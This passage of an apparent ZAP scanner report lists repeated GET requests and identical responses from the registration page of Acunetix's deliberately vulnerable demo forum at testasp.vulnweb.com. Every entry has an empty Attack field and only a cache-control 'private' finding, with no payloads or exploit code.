type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real 